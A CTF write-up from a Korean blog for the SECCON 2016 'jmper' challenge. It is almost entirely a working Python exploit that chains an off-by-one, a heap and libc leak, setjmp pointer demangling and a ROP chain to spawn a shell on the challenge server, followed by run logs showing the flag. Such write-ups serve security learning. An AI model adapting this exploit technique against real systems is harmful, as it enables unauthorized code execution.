SECCON CTF QUAL 2016 - jmper

2017. 1. 2. 18:05·CTF/2016

Category : Pwnables 


jmper

Summary : off by one to rop, setjmp



Exploit

#!/usr/bin/python


from socket import *

from struct import pack, unpack

import time


def rc(s, ch):

    res = ''

    while ch not in res:

        res += s.recv(1)

    return res


#def ror64(value, count):


def ROR(data, shift, size=64):

    shift %= size

    body = data >> shift

    remains = (data << (size - shift)) - (body << size)

    return (body + remains)


p = lambda x : pack("<Q", x)

up = lambda x : unpack("<Q", x)[0]



HOST = '127.0.0.1'

PORT = 9999


HOST = 'jmper.pwn.seccon.jp'

PORT = 5656


libc_start_main_got = 0x601FB0


def add_student(s):

    s.send('1\n')


def name_student(s, idx, name):

    s.send('2\n')

    rc(s, 'ID:')

    s.send(str(idx) + '\n')

    rc(s, 'Input name:')

    s.send(name)


def memo_student(s, idx, memo):

    s.send('3\n')

    rc(s, 'ID:')

    s.send(str(idx) + '\n')

    rc(s, 'Input memo:')

    s.send(memo)


def show_name(s, idx):

    s.send('4\n')

    rc(s, 'ID:')

    s.send(str(idx) + '\n')

    return rc(s, '1. Add')[:-6]


def show_memo(s, idx):

    s.send('5\n')

    rc(s, 'ID:')

    s.send(str(idx) + '\n')

    return rc(s, '1. Add')[:-6]



s = socket(AF_INET, SOCK_STREAM)

s.connect((HOST, PORT))

raw_input(">>")

rc(s, '6. Bye :)\n')

add_student(s)  # 0


rc(s, '6. Bye :)\n')

add_student(s)  # 0


rc(s, '6. Bye :)\n')

memo_student(s, 0, 'a'*32 + '\x08')


rc(s, '6. Bye :)\n')

heap_leak = up(show_name(s, 0).ljust(8, '\x00'))

print 'heap leak : ', hex(heap_leak)

jmp_buf = heap_leak - 0xf8 + 0x30 #(rsp, rip)


rc(s, '6. Bye :)\n')

memo_student(s, 0, 'a'*32 + '\x78')


rc(s, '6. Bye :)\n')

name_student(s, 0, p(jmp_buf)+'\n')


rc(s, '6. Bye :)\n')

rsp_rip = show_name(s, 1)[:16]

rsp = up(rsp_rip[:8])

rip = up(rsp_rip[8:])

fs_val = ROR(rip, 0x11, 64) ^ 0x0400C31

rsp = ROR(rsp, 0x11, 64) ^ fs_val


print 'rsp : ', hex(rsp)

# ror 0x11 ^ fs[0x30]


rc(s, '6. Bye :)\n')

name_student(s, 0, p(libc_start_main_got)+'\n')


rc(s, '6. Bye :)\n')

libc_start_main_libc = up(show_name(s, 1)[:8].ljust(8, '\x00'))

libc_base = libc_start_main_libc - 0x000000000021e50

system_libc = libc_base + 0x0000000000046590

pop_rdi = libc_base + 0x0000000000022b9a

# 0000000000046590 <__libc_system@@GLIBC_PRIVATE>:

# 0000000000021e50 <__libc_start_main@@GLIBC_2.2.5>:

# 0000000000022b9a : pop rdi ; ret

print 'libc_start_main_libc : ', hex(libc_start_main_libc)

print 'system_libc : ', hex(system_libc)


payload =''

payload += p(pop_rdi)

payload += p(heap_leak+0x50)

payload += p(system_libc)




# overwrite ret

rc(s, '6. Bye :)\n')

name_student(s, 0, p(rsp + 0x18)+'\n')

rc(s, '6. Bye :)\n')

name_student(s, 1, payload+'\n')


# for arg "sh"

rc(s, '6. Bye :)\n')

memo_student(s, 1, "sh"+'\n')


for i in range(0, 29 - 2):

    rc(s, '6. Bye :)\n')

    add_student(s)  # 0



time.sleep(0.1)

s.send('ls -l\n')

time.sleep(0.1)

raw_input('> ')

print s.recv(1024)

s.send('cat flag\n')

raw_input('> ')

print s.recv(1024)


s.close()


"""

    pwn3r$ python jmper_exploit.py

    >>

    heap leak :  0x239a208

    rsp :  0x7ffe73389820L

    libc_start_main_libc :  0x7fcf6c59ee50

    system_libc :  0x7fcf6c5c3590

    >

    1. Add student.

    2. Name student.

    3. Write memo

    4. Show Name

    5. Show memo.

    6. Bye :)

    1. Add student.

    2. Name student.

    3. Write memo

    4. Show Name

    5. Show memo.

    6. Bye :)

    Exception has occurred. Jump!

    Nice jump! Bye :)

    total 20

    -r--r--r-- 1 root root    32 Dec  8 16:20 flag

    -rwxr-xr-x 1 root root 13044 Dec  8 15:30 jmper

    

    >

    Traceback (most recent call last):

    File "jmper_exploit.py", line 138, in <module>

    print s.recv(1024)


    pwn3r$ python jmper_exploit.py

    >>

    heap leak :  0x78e208

    rsp :  0x7ffd5c7655e0L

    libc_start_main_libc :  0x7f6915ae2e50

    system_libc :  0x7f6915b07590

    > 

    1. Add student.

    2. Name student.

    3. Write memo

    4. Show Name

    5. Show memo.

    6. Bye :)

    1. Add student.

    2. Name student.

    3. Write memo

    4. Show Name

    5. Show memo.

    6. Bye :)

    Exception has occurred. Jump!

    Nice jump! Bye :)

    

    > 

    SECCON{3nj0y_my_jmp1n9_serv1ce}

"""


저작자표시 (새창열림)

'CTF > 2016' 카테고리의 다른 글

33C3 CTF - grunt  (0) 2018.12.14
33C3 CTF - tea  (0) 2018.12.14
33C3 CTF - rec  (0) 2018.12.14
33C3 CTF - babyfengshui  (0) 2018.12.14
SECCON CTF QUAL 2016 - checker  (0) 2017.01.02
'CTF/2016' 카테고리의 다른 글
  • 33C3 CTF - tea
  • 33C3 CTF - rec
  • 33C3 CTF - babyfengshui
  • SECCON CTF QUAL 2016 - checker
pwn3r_45
pwn3r_45
  • pwn3r_45
    pwn3r_45
    pwn3r_45
  • 전체
    오늘
    어제
    • View All (155)
      • Paper (0)
        • Power Grid (0)
        • Software_Kernel (0)
        • Exploitation (0)
        • RTOS (0)
        • UAV (0)
        • SCADA (0)
      • Articles (0)
      • Personal (18)
      • Technical Note (9)
        • Hardware (1)
        • Vulnerability Research (8)
        • Binary Exploitation (5)
        • PR23 (0)
        • Vulnerability (1)
        • Linux Kernel (1)
        • 현대암호 (0)
      • CTF (90)
        • 2025 (0)
        • 2024 (1)
        • 2023 (5)
        • 2019 (5)
        • 2018 (20)
        • 2017 (7)
        • 2016 (6)
        • 2015 (1)
        • 2014 (3)
        • 2013 (14)
        • 2012 (6)
      • Wargame (22)
        • FTZ (13)
        • Lord Of Bof - Redhat 6.2 (0)
        • IO.smashthestack.org (5)
        • Amateria.smashthestack.org (0)
        • pwnable.tw (0)
        • Vortex.overthewire.org (3)
        • Webhacking.kr (0)
        • reversing.kr (0)
        • dreamhack.io (0)
        • CodeEngn (1)
      • Reverse engineering (1)
      • Issue (13)
        • Conference_CTF info (13)
      • Coding (0)
        • C# (0)
      • ETC (2)
      • 미완성 (0)
  • 블로그 메뉴

    • Home
    • Tag
    • MediaLog
    • LocationLog
    • Guestbook
    • Admin
    • Write
  • 링크

    • 6l4ck3y3
    • idkwim
    • gogil
    • dakuo
    • badcob
    • 임준오씨 블로그
    • 김용진씨 블로그
    • david942j
    • orange tsai
    • pwndiary
    • theori
    • tacxingxing
    • jinmo123's team blog
    • ConS-tanT
    • jaybosamiya
    • procdiaru
  • 공지사항

  • 인기 글

  • 태그

    pwnables
    csaw ctf
    gnuboard
    POC
    정보보호올림피아드
    후기
    csaw
    HUST
    power of community
    web
    HUST2011
    vuln
  • 최근 댓글

  • 최근 글

  • hELLO· Designed By정상우.v4.10.3
pwn3r_45
SECCON CTF QUAL 2016 - jmper
상단으로

티스토리툴바